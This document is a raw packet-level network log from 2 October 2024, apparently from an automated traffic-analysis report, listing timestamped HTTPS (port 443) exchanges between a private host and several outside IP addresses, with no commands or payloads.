                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.033691883 CEST44349706184.28.90.27192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.034166098 CEST44349706184.28.90.27192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.085036039 CEST49706443192.168.2.7184.28.90.27
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.086528063 CEST49706443192.168.2.7184.28.90.27
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.131403923 CEST44349706184.28.90.27192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.194381952 CEST49672443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.225631952 CEST49671443192.168.2.7204.79.197.203
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.312711000 CEST44349706184.28.90.27192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.312890053 CEST44349706184.28.90.27192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.312918901 CEST49706443192.168.2.7184.28.90.27
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.312951088 CEST44349706184.28.90.27192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.312964916 CEST49706443192.168.2.7184.28.90.27
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.312972069 CEST44349706184.28.90.27192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.312978983 CEST49706443192.168.2.7184.28.90.27
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.312982082 CEST44349706184.28.90.27192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.359575033 CEST49707443192.168.2.7184.28.90.27
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.359647989 CEST44349707184.28.90.27192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.359714985 CEST49707443192.168.2.7184.28.90.27
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.360281944 CEST49707443192.168.2.7184.28.90.27
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:30.360301018 CEST44349707184.28.90.27192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:31.041505098 CEST44349707184.28.90.27192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:31.041594028 CEST49707443192.168.2.7184.28.90.27
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:31.042948008 CEST49707443192.168.2.7184.28.90.27
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:31.042969942 CEST44349707184.28.90.27192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:31.043443918 CEST44349707184.28.90.27192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:31.044518948 CEST49707443192.168.2.7184.28.90.27
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:31.087414026 CEST44349707184.28.90.27192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:31.326965094 CEST44349707184.28.90.27192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:31.327140093 CEST44349707184.28.90.27192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:31.327234030 CEST49707443192.168.2.7184.28.90.27
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:31.328169107 CEST49707443192.168.2.7184.28.90.27
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:31.328202963 CEST44349707184.28.90.27192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:31.328217030 CEST49707443192.168.2.7184.28.90.27
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:31.328224897 CEST44349707184.28.90.27192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:31.444441080 CEST49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:32.624252081 CEST44349701104.98.116.138192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:32.624365091 CEST49701443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:37.765435934 CEST49710443192.168.2.7167.114.14.170
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:37.765477896 CEST44349710167.114.14.170192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:37.765533924 CEST49710443192.168.2.7167.114.14.170
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:37.772455931 CEST49710443192.168.2.7167.114.14.170
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:37.772465944 CEST44349710167.114.14.170192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:38.251760006 CEST44349710167.114.14.170192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:38.251849890 CEST49710443192.168.2.7167.114.14.170
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:38.253813028 CEST49710443192.168.2.7167.114.14.170
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:38.253825903 CEST44349710167.114.14.170192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:38.254172087 CEST44349710167.114.14.170192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:38.257122040 CEST49710443192.168.2.7167.114.14.170
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:38.303395987 CEST44349710167.114.14.170192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:39.143621922 CEST44349710167.114.14.170192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:39.143899918 CEST44349710167.114.14.170192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:39.143976927 CEST49710443192.168.2.7167.114.14.170
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:39.161873102 CEST49710443192.168.2.7167.114.14.170
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:39.161890030 CEST44349710167.114.14.170192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:39.405113935 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:39.405168056 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:39.405266047 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:39.412533045 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:39.412547112 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:39.998224974 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:39.998300076 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.000391006 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.000407934 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.000725031 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.003228903 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.047411919 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.187561989 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.187589884 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.187616110 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.187800884 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.187827110 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.187957048 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.269856930 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.269901037 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.270114899 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.270136118 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.270253897 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.271608114 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.271644115 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.271693945 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.271699905 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.271750927 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.271750927 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.360724926 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.360768080 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.360951900 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.360951900 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.360994101 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.361037970 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.362024069 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.362072945 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.362123013 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.362123013 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.362133980 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.362195969 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.363790035 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.363843918 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.363878965 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.363886118 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.363902092 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.363926888 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.368360996 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.368419886 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.368474960 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.368475914 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.368484020 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.368526936 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.450934887 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.450970888 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.451071024 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.451092005 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.451141119 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.451839924 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.451869965 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.451914072 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.451921940 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.451961040 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.451961040 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.452786922 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.452812910 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.452888012 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.452888012 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.452894926 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.453001976 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.453736067 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.453771114 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.453809977 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.453815937 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.453847885 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.453859091 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.459234953 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.459270000 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.459342003 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.459342003 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.459352016 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.459405899 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.541636944 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.541671038 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.541706085 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.541723013 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.541768074 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.541786909 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.542184114 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.542211056 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.542243958 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.542249918 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.542280912 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.542294979 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.542890072 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.542912006 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.542946100 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.542952061 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.542995930 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.543689966 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.543716908 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.543752909 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.543760061 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.543795109 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.543808937 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.544063091 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.544085026 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.544121027 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.544127941 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.544158936 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.544174910 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.544866085 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.544898987 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.544928074 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.544934034 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.544964075 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.544977903 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.549221039 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.549251080 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.549289942 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.549295902 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.549333096 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.632282972 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.632352114 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.632373095 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.632395983 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.632410049 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.632436037 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.632580042 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.632628918 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.632635117 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.632654905 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.632680893 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.632699013 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.633086920 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.633131981 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.633153915 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.633161068 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.633188009 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.633205891 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.633706093 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.633785009 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.633785009 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.633816957 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.633855104 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.633877039 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.636982918 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.637032032 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.637054920 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.637083054 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.637098074 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.637115002 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.637455940 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.637507915 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.637532949 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.637542009 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.637566090 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.637584925 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.637943029 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.637985945 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.638005018 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.638012886 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.638039112 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.638070107 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.639813900 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.639870882 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.639884949 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.639899015 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.639930010 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.639945030 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.641741037 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.722620964 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.722681999 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.722739935 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.722774982 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.722805023 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.722821951 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.722832918 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.722863913 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.722888947 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.722914934 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.722933054 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.722990036 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.723448038 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.723490953 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.723511934 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.723522902 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.723546982 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.723563910 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.723973989 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.724015951 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.724041939 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.724047899 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.724071026 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.724088907 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.724510908 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.724558115 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.724579096 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.724586964 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.724625111 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.725076914 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.725117922 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.725146055 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.725152016 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.725176096 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.725189924 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.725625992 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.725671053 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:40.725693941 CEST49713443192.168.2.7167.114.14.168
